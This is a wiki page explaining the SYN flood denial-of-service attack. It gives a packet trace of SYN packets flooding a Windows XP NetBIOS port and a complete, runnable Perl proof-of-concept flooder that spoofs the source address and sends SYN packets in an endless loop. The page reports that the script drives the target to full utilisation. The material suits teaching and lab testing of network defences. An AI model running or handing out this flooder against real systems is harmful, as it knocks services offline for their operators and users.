SYN Flood
From MRL Wiki
SYN Flood is a Denial of Service attack which exploits a three-way handshake (SYN -> SYN/ACK -> ACK) used in establishing of TCP connection. By sending a large number of SYN packets without ever responding to SYN/ACK responses coming from the target host, the attacker effectively creates a large number of half-open connections eventually exhausting target host's ability to process any more new connections.
Contents |
[edit] Hping
[edit] Packet Trace
Below is a packet trace of a typical SYN Attack. We are sending SYN packets to netbios port on Windows XP machine:
0.000000 192.168.1.66 -> 192.168.1.250 TCP 24345 > netbios-ssn [SYN] Seq=0 Len=0 0.000694 192.168.1.66 -> 192.168.1.250 TCP 15869 > netbios-ssn [SYN] Seq=0 Len=0 0.001019 192.168.1.66 -> 192.168.1.250 TCP 32851 > netbios-ssn [SYN] Seq=0 Len=0 0.001337 192.168.1.66 -> 192.168.1.250 TCP 39007 > netbios-ssn [SYN] Seq=0 Len=0 0.001653 192.168.1.66 -> 192.168.1.250 TCP 12675 > netbios-ssn [SYN] Seq=0 Len=0 0.001968 192.168.1.66 -> 192.168.1.250 TCP 18094 > netbios-ssn [SYN] Seq=0 Len=0 0.002287 192.168.1.66 -> 192.168.1.250 TCP 51402 > netbios-ssn [SYN] Seq=0 Len=0 0.002605 192.168.1.66 -> 192.168.1.250 TCP 33243 > netbios-ssn [SYN] Seq=0 Len=0 0.002919 192.168.1.66 -> 192.168.1.250 TCP 42948 > netbios-ssn [SYN] Seq=0 Len=0 ...
[edit] Code
The code below is the simplest possible implementation of SYN Flooder. This poc causes 100% utilization on Windows XP SP2 with the firewall off.
#!/usr/bin/perl
# Simple POC SYN Flooder
# Requires perl, Net::RawIP module, and root privileges
use Net::RawIP;
if($#ARGV == 2) {
($src,$dst,$port) = @ARGV;
$a = new Net::RawIP;
while(1) {
$src_port = rand(65534)+1;
$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}});
$a->send;
}
} else {
print "./synflooder source_ip destination_ip destination_port\n";
}